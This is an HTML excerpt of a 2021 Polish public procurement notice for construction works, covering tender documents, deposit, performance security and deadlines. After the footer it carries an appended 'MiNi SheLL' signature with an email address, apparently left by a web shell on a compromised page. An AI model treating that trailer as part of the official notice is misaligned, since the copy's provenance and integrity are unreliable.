5 dni od dnia wezwania, terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych: a) informacji banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, o których mowa w pkt 4.3 SWZ, w okresie nie wcześniejszym niż 3<br/>miesiące przed jej złożeniem b) Wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - na załączniku nr 6 do<br/>SWZ. c) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – wykaz osób stanowi załącznik nr 7 do SWZ i powinien zawierać<br/>szczegółowe informacje i dane niezbędne do oceny warunków udziału w postępowaniu, o których<br/>mowa w punkcie 4.4 ppkt 1 lit. B specyfikacji warunków zamówienia tj.: nazwę, specjalność i zakres<br/>posiadanych uprawnień, okres doświadczenia, stanowisko oraz podać informację o podstawie do<br/>dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Formularz Oferty. Oferta musi być sporządzona w języku polskim, pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej i opatrzona kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym. Dokumenty lub oświadczenia,<br/>o których mowa w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415), sporządzone w<br/>języku obcym przekazuje się wraz z tłumaczeniem na język polski. Sposób złożenia oferty, w<br/>tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie:<br/>https://miniportal.uzp.gov.pl/. 2. Treść oferty musi być zgodna z wymaganiami Zamawiającego<br/>określonymi w dokumentach zamówienia. 3. Oferta oraz pozostałe oświadczenia i dokumenty,<br/>dla których Zamawiający określił wzory w formie formularzy stanowiących załączniki do<br/>niniejszej specyfikacji, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz<br/>opisu, kolumn i wierszy. 4. Oferta oraz oświadczenia o których mowa w art. 125 ust. 1 ustawy<br/>Pzp powinny być podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>wymienione w dokumencie potwierdzającym status prawny firmy lub posiadające<br/>pełnomocnictwo (pkt 5.10. SWZ stosuje się). Pełnomocnictwo winno być sporządzone w formie<br/>elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości<br/>26.000,00 PLN. Wadium musi być utrzymane nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.2. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:– pieniądzu,– gwarancjach bankowych,– gwarancjach<br/>ubezpieczeniowych,– poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 – tekst jednolity). 3.Wadium wnoszone w pieniądzu<br/>należy wpłacić przelewem na konto zamawiającego w Bank Spółdzielczy Gogolin O/ Prószków<br/>dla: a) rozliczeń krajowych nr 63 8883 1031 2004 0000 1023 0001,Oferta jest zabezpieczona<br/>wadium, jeżeli wpłacona przelewem kwota w chwili składania ofert znajduje się na powyższym<br/>koncie. Wadium wnoszone w formie innej niż pieniądz, wykonawca przekazuje zamawiającemu<br/>oryginał gwarancji lub poręczenia, w postaci elektronicznej. 4. Zamawiający zwróci wadium<br/>niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności, z<br/>zastrzeżeniem punktu 16.10:. 1) upływu terminu związania ofertą;2) zawarcia umowy w sprawie<br/>zamówienia publicznego; 3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem<br/>sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynności unieważnienia albo nie upłynął<br/>termin do jego wniesienia. 5. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni<br/>od dnia złożenia wniosku zwraca wadium Wykonawcy: 1) który wycofał ofertę przed upływem<br/>terminu składania ofert; 2) którego oferta została odrzucona; 3) po wyborze najkorzystniejszej<br/>oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza; 4) po<br/>unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia. 6. Złożenie wniosku o zwrot<br/>wadium, o którym mowa w pkt 16.5 powoduje rozwiązanie stosunku prawnego z Wykonawcą<br/>wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w<br/>dziale IX ustawy Pzp. 7. Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami<br/>wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,<br/>pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew<br/>pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 8. Zamawiający zwraca wadium<br/>wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi<br/>oświadczenia o zwolnieniu wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>żaden z nich nie może podlegać wykluczeniu z powodu przesłanek, o których mowa w punkcie<br/>4.8 SWZ. 3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie wymienione w punkcie 5.1 SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. 4. Na wezwanie Zamawiającego<br/>zgodnie z art. 274 ust 1 ustawy Pzp każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie przedkłada również dokumenty podmiotowe, określone w punkcie 5.4 i 5.5 SWZ.<br/>Dokumenty te potwierdzają brak podstaw wykluczenia w stosunku do każdego Wykonawcy<br/>wspólnie ubiegającego się o udzielenie zamówienia oraz spełniania warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami par. 18 projektu umowy stanowiącego załącznik nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ustanawia się zabezpieczenie należytego wykonania umowy w wysokości 3,5 % ceny całkowitej<br/>podanej w ofercie albo maksymalnej wartości nominalnej zobowiązania Zamawiającego<br/>wynikającego z umowy. Wykonawca przed podpisaniem umowy zobowiązany będzie do<br/>wniesienia zabezpieczenia należytego wykonania umowy w jednej lub kilku następujących<br/>formach:– pieniądzu na konto zamawiającego w Bank Spółdzielczy Gogolin O/ Prószków dla:a)<br/>rozliczeń krajowych nr 63 8883 1031 2004 0000 1023 0001,– poręczeniach bankowych lub<br/>poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest<br/>zawsze zobowiązaniem pieniężnym,– gwarancjach bankowych,– gwarancjach<br/>ubezpieczeniowych,– poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com